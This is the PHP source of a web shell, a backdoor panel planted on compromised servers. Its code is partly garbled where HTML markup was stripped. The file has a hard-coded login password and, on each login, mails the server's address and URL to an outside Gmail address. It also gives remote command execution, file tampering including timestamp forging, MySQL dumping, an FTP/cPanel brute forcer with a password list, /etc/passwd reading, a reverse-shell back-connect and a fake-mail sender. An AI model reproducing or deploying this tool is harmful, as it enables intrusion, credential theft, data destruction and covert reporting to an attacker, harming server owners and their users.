$_value) { if ($_key{0} != '_') { if (IS_GPC) { $_value = s_array($_value); } $$_key = $_value; } } } /*================= Info Login ================*/ $admin = array(); $admin['check'] = true; $admin['pass'] = 'sempak'; // Password login $admin['cookiepre'] = ''; $admin['cookiedomain'] = ''; $admin['cookiepath'] = '/'; $admin['cookielife'] = 86400; /*===================== End =====================*/ if ($charset == 'utf8') { header("content-Type: text/html; charset=utf-8"); } elseif ($charset == 'big5') { header("content-Type: text/html; charset=big5"); } elseif ($charset == 'gbk') { header("content-Type: text/html; charset=gbk"); } elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-2"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== Login =====================*/ if ($action == "logout") { scookie('vbapass', '', -86400 * 365); p(''); p('
'); exit; } if($admin['check']) { if ($doing == 'login') { if ($admin['pass'] == $password) { scookie('vbapass', $password); $time_shell = "".date("d/m/Y - H:i:s").""; $ip_remote = $_SERVER["REMOTE_ADDR"]; $from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).''; $to_email = 'mo3slim2010@gmail.com'; $server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['HTTP_HOST'].""; $linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell"; $header = "From: $from_shellcode\ \ Reply-to: $from_shellcode"; @mail($to_email, $server_mail, $linkcr, $header); p(''); p('
Loading |
|
|
[Server IP: ".gethostbyname($_SERVER['SERVER_NAME'])."";?> - Your IP: ".$_SERVER['REMOTE_ADDR']."";?>] File Manager | MySQL Manager | MySQL Upload & Download | Execute Command | PHP Variable | Eval PHP Code | Brute | /etc/passwd | Back Connect | Fake mail |
'goaction'));
makehide('action');
formfoot();
$errmsg && m($errmsg);
// Dir function
!$dir && $dir = '.';
$nowpath = getPath(SA_ROOT, $dir);
if (substr($dir, -1) != '/') {
$dir = $dir.'/';
}
$uedir = ue($dir);
if (!$action || $action == 'file') {
// Non-writeable
$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
// Delete dir
if ($doing == 'deldir' && $thefile) {
if (!file_exists($thefile)) {
m($thefile.' directory does not exist');
} else {
m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
}
}
// Create new dir
elseif ($newdirname) {
$mkdirs = $nowpath.$newdirname;
if (file_exists($mkdirs)) {
m('Directory has already existed');
} else {
m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
@chmod($mkdirs,0777);
}
}
// Upload file
elseif ($doupfile) {
m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
}
// Edit file
elseif ($editfilename && $filecontent) {
$fp = @fopen($editfilename,'w');
m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
@fclose($fp);
}
// Modify
elseif ($pfile && $newperm) {
if (!file_exists($pfile)) {
m('The original file does not exist');
} else {
$newperm = base_convert($newperm,8,10);
m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
}
}
// Rename
elseif ($oldname && $newfilename) {
$nname = $nowpath.$newfilename;
if (file_exists($nname) || !file_exists($oldname)) {
m($nname.' has already existed or original file does not exist');
} else {
m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
}
}
// Copu
elseif ($sname && $tofile) {
if (file_exists($tofile) || !file_exists($sname)) {
m('The goal file has already existed or original file does not exist');
} else {
m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
}
}
// File exit
elseif ($curfile && $tarfile) {
if (!@file_exists($curfile) || !@file_exists($tarfile)) {
m('The goal file has already existed or original file does not exist');
} else {
$time = @filemtime($tarfile);
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}
// Date
elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
if (!@file_exists($curfile)) {
m(basename($curfile).' does not exist');
} else {
$time = strtotime("$year-$month-$day $hour:$minute:$second");
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}
// Download
elseif($doing == 'downrar') {
if ($dl) {
$dfiles='';
foreach ($dl as $filepath => $value) {
$dfiles.=$filepath.',';
}
$dfiles=substr($dfiles,0,strlen($dfiles)-1);
$dl=explode(',',$dfiles);
$zip=new PHPZip($dl);
$code=$zip->out;
header('Content-type: application/octet-stream');
header('Accept-Ranges: bytes');
header('Accept-Length: '.strlen($code));
header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
echo $code;
exit;
} else {
m('Please select file(s)');
}
}
// Delete file
elseif($doing == 'delfiles') {
if ($dl) {
$dfiles='';
$succ = $fail = 0;
foreach ($dl as $filepath => $value) {
if (@unlink($filepath)) {
$succ++;
} else {
$fail++;
}
}
m('Deleted file have finished??choose '.count($dl).' success '.$succ.' fail '.$fail);
} else {
m('Please select file(s)');
}
}
// Function Newdir
formhead(array('name'=>'createdir'));
makehide('newdirname');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileperm'));
makehide('newperm');
makehide('pfile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'copyfile'));
makehide('sname');
makehide('tofile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'rename'));
makehide('oldname');
makehide('newfilename');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileopform'));
makehide('action');
makehide('opfile');
makehide('dir');
formfoot();
$free = @disk_free_space($nowpath);
!$free && $free = 0;
$all = @disk_total_space($nowpath);
!$all && $all = 0;
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
p('File Manager Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)');
?>
| ||||||
');
p(' | ||||||
Filename | Last modified | Size | Chmod / Perms | Action | ||
0 | '); p(''.$dirdb['filename'].' | '); p(''.$dirdb['mtime'].' | '); p('-- | '); p(''); p(''.$dirdb['dirchmod'].' / '); p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].' | '); p('Del | Rename | '); p('|
= | Parent Directory | '); p('|||||
'); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBName:'); makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); p('
'); formfoot(); p(''); } elseif ($action == 'sqladmin') { !$dbhost && $dbhost = 'localhost'; !$dbuser && $dbuser = 'root'; !$dbport && $dbport = '3306'; $dbform = ''; if(isset($dbhost)){ $dbform .= "\ "; } if(isset($dbuser)) { $dbform .= "\ "; } if(isset($dbpass)) { $dbform .= "\ "; } if(isset($dbport)) { $dbform .= "\ "; } if(isset($dbname)) { $dbform .= "\ "; } if(isset($charset)) { $dbform .= "\ "; } if ($doing == 'backupmysql' && $saveasfile) { if (!$table) { m('Please choose the table'); } else { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); $table = array_flip($table); $fp = @fopen($path,'w'); if ($fp) { $result = q('SHOW tables'); if (!$result) p(''); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); p('
'); formfoot(); ?> 'recordlist')); makehide('doing'); makehide('action','sqladmin'); makehide('base64'); makehide('tablename'); p($dbform); formfoot(); // Data formhead(array('name'=>'setdbname')); makehide('action','sqladmin'); p($dbform); if (!$dbname) { makehide('dbname'); } formfoot(); formhead(array('name'=>'settable')); makehide('action','sqladmin'); p($dbform); makehide('tablename'); makehide('page',$page); makehide('doing'); formfoot(); $cachetables = array(); $pagenum = 30; $page = intval($page); if($page) { $start_limit = ($page - 1) * $pagenum; } else { $start_limit = 0; $page = 1; } if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); // get mysql server $mysqlver = mysql_get_server_info(); p('MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'
'); $highver = $mysqlver > '4.1' ? 1 : 0; // Show database $query = q("SHOW DATABASES"); $dbs = array(); $dbs[] = '-- Select a database --'; while($db = mysql_fetch_array($query)) { $dbs[$db['Database']] = $db['Database']; } makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); $tabledb = array(); if ($dbname) { p(''); p('Current dababase: '.$dbname.''); if ($tablename) { p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]'); } p('
'); mysql_select_db($dbname); $getnumsql = ''; $runquery = 0; if ($sql_query) { $runquery = 1; } $allowedit = 0; if ($tablename && !$sql_query) { $sql_query = "SELECT * FROM $tablename"; $getnumsql = $sql_query; $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; $allowedit = 1; } p(''); if ($tablename || ($runquery && $sql_query)) { if ($doing == 'structure') { $result = q("SHOW COLUMNS FROM $tablename"); $rowdb = array(); while($row = mysql_fetch_array($result)) { $rowdb[] = $row; } p('Field | '); p('Type | '); p('Null | '); p('Key | '); p('Default | '); p('Extra | '); p('
'.$row['Field'].' | '); p(''.$row['Type'].' | '); p(''.$row['Null'].' | '); p(''.$row['Key'].' | '); p(''.$row['Default'].' | '); p(''.$row['Extra'].' | '); p('
Action | '); $fieldnum = @mysql_num_fields($result); for($i=0;$i<$fieldnum;$i++){ $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); p("$name $type($len) | ");
}
p('
'.html_clean($inside).' | '; } $where = base64_encode($where); if ($allowedit) p('Edit | Del | '); p($b1); p('
'); p('Your IP:'); makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); p('Your Port:'); makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); p('Use:'); makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt')); p('
'); formfoot(); }//end backconnect window via NC // Brute elseif ($action == 'brute') { formhead(array('title'=>'Brute Forcer')); makehide('action','brute'); makehide('dir',$brute); @ini_set('memory_limit', 1000000000000); $connect_timeout=5; @set_time_limit(0); $submit = $_REQUEST['submit']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $option = $_REQUEST['option']; $passlist = "0123456 01234567 012345678 0123456789 01234567890 123456 1234567 12345678 123456789 1234567890 111111 000000 222222 333333 444444 555555 666666 777777 888888 999999 123123 456456 789789 123321 456654 654321 7654321 87654321 987654321 0987654321 admin administrator admincp cpanel adminx admins password passwords passw0rd p@ssw0rd p@ssword khongco 25251325 passw0rds"; if($target == ''){ $target = 'localhost'; } print "";
?>
Error : Connection timed out , make confidence about validation of target !";
exit;}
elseif ( curl_errno($ch) == 0 ){
p("[ mo3slim2010@gmail.com ]#
Attacking has been done! Username: $user / Password: $pass => Login
");
}
curl_close($ch);}
function cpanel_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {
print " Error : Connection timed out , make confidence about validation of target !";
exit;}
elseif ( curl_errno($ch) == 0 ){
p("[ namtuocbongdemhk@gmail.com ]# Attacking has been done! Username: $user / Password: $pass
");}curl_close($ch);}
if(isset($submit) && !empty($submit)){
$userlist = explode ("\
" , $users );
$passlist = explode ("\
" , $pass );
p('[ namtuocbongdemhk@gmail.com ]# Attacking ...
');
foreach ($userlist as $user) {
$_user = trim($user);
foreach ($passlist as $password ) {
$_pass = trim($password);
if($option == "ftp"){
ftp_check($target,$_user,$_pass,$connect_timeout);
}
if ($option == "cpanel")
{
cpanel_check($target,$_user,$_pass,$connect_timeout);
}
}
}
}
formfoot();
}
elseif ($action == 'etcpwd') {
formhead(array('title'=>'Get /etc/passwd'));
makehide('action','etcpwd');
makehide('dir',$nowpath);
$i = 0;
echo "
Instead »'); p('year:'); makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); p('month:'); makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); p('day:'); makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); p('hour:'); makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); p('minute:'); makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); p('second:'); makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); p('
'); formfooter(); }//end newtime elseif ($action == 'shell') { if (IS_WIN && IS_COM) { if($program && $parameter) { $shell= new COM('Shell.Application'); $a = $shell->ShellExecute($program,$parameter); m('Program run has '.(!$a ? 'success' : 'fail')); } !$program && $program = 'c:\windows\system32\cmd.exe'; !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; formhead(array('title'=>'Execute Program')); makehide('action','shell'); makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); p(''); makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('
'); formfoot(); } formhead(array('title'=>'Execute Command')); makehide('action','shell'); if (IS_WIN && IS_COM) { $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); } p(''); makeinput(array('title'=>'Command','name'=>'command','value'=>$command)); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('
'); formfoot(); if ($command) { p(''); if ($execfunc=='wscript' && IS_WIN && IS_COM) { $wsh = new COM('WScript.shell'); $exec = $wsh->exec('cmd.exe /c '.$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) { $descriptorspec = array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ); $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], $command."\ \ "); fwrite($pipes[0], "exit\ \ "); fclose($pipes[0]); while (!feof($pipes[1])) { echo fgets($pipes[1], 1024); } fclose($pipes[1]); while (!feof($pipes[2])) { echo fgets($pipes[2], 1024); } fclose($pipes[2]); proc_close($process); } } else { echo(execute($command)); } p(''); } }//end shell elseif ($action == 'phpenv') { $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); !$dis_func && $dis_func = 'No'; $info = array( 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), 2 => array('Server Domain',$_SERVER['SERVER_NAME']), 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS',PHP_OS), 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), 8 => array('PHP run mode',strtoupper(php_sapi_name())), 9 => array('The file path',__FILE__), 10 => array('PHP Version',PHP_VERSION), 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), 12 => array('Safe Mode',getcfg('safe_mode')), 13 => array('Administrator',$adminmail), 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), 15 => array('enable_dl',getcfg('enable_dl')), 16 => array('display_errors',getcfg('display_errors')), 17 => array('register_globals',getcfg('register_globals')), 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), 19 => array('memory_limit',getcfg('memory_limit')), 20 => array('post_max_size',getcfg('post_max_size')), 21 => array('upload_max_filesize',$upsize), 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), 23 => array('disable_functions',$dis_func), ); if($phpvarname) { m($phpvarname .' : '.getcfg($phpvarname)); } formhead(array('title'=>'Server environment')); makehide('action','phpenv'); makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1)); formfooter(); $hp = array(0=> 'Server', 1=> 'PHP'); for($a=0;$a<2;$a++) { p('
Pages: '.$multipage.'
' : ''; } return $multipage; } // Login page function loginpage() { ?>$arg[title]
"); } else { p("$arg[title]"); } } function makeselect($arg = array()){ if ($arg['onchange']) { $onchange = 'onchange="'.$arg['onchange'].'"'; } $arg['title'] = $arg['title'] ? $arg['title'] : ''; if ($arg['newline']) p(''); p("$arg[title] "); if ($arg['newline']) p('
'); } function formhead($arg = array()) { !$arg['method'] && $arg['method'] = 'post'; !$arg['action'] && $arg['action'] = $self; $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; !$arg['name'] && $arg['name'] = 'form1'; p("'); } function formfoot(){ p(''); } // Exit function pr($a) { echo ''; print_r($a); echo ''; } ?>